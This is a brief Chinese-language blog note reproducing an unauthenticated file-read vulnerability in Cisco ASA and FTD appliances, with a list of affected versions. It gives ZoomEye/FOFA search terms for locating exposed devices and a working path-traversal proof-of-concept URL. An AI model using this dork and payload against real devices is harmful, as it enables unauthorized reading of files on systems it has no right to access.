一、前言
前端时间碰到了该漏洞,记录一下!
二、漏洞介绍
该漏洞为思科ASA设备和FTD设备的未授权任意文件读取漏洞,但仅能读取到WEB目录下的文件,影响版本如下:
-
Cisco ASA:<= 9.6
-
Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14
-
Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0
三、漏洞复现
首先利用zoomeye或者fofa搜索设备,搜索关键词为/+CSCOE+/,如下图所示:
POC为URL/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../,如下图所示:
